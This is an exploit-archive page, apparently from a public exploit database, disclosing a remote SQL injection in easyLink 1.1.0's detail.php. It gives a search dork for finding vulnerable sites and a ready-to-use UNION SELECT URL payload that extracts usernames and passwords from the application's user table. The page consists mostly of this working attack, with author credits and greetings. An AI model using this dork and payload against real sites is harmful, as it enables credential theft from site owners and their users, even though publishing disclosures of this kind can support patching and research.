[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability
# Published : 2008-09-19
# Author : Egypt Coder
# Previous Title : Pluck 4.5.3 (update.php) Remote File Corruption Exploit
# Next Title : Explay CMS <= 2.1 Persistent XSS and CSRF Vulnerability


================================================================================
easyLink V1.1.0 (detail.php) Remote SQL Injection Vulnerability
================================================================================



Discovered By: Egypt Coder

home : WWW.Sec-Area.com

Mail: Egyptcoder@hotmail.com



Dork: Engine powered by easyLink V1.1.0.



Exploit :


http://localhost/links/detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user


Greets  rUnViruS, Error Code, H666p , Fear Master , ProViDoR

# www.Syue.com [2008-09-19]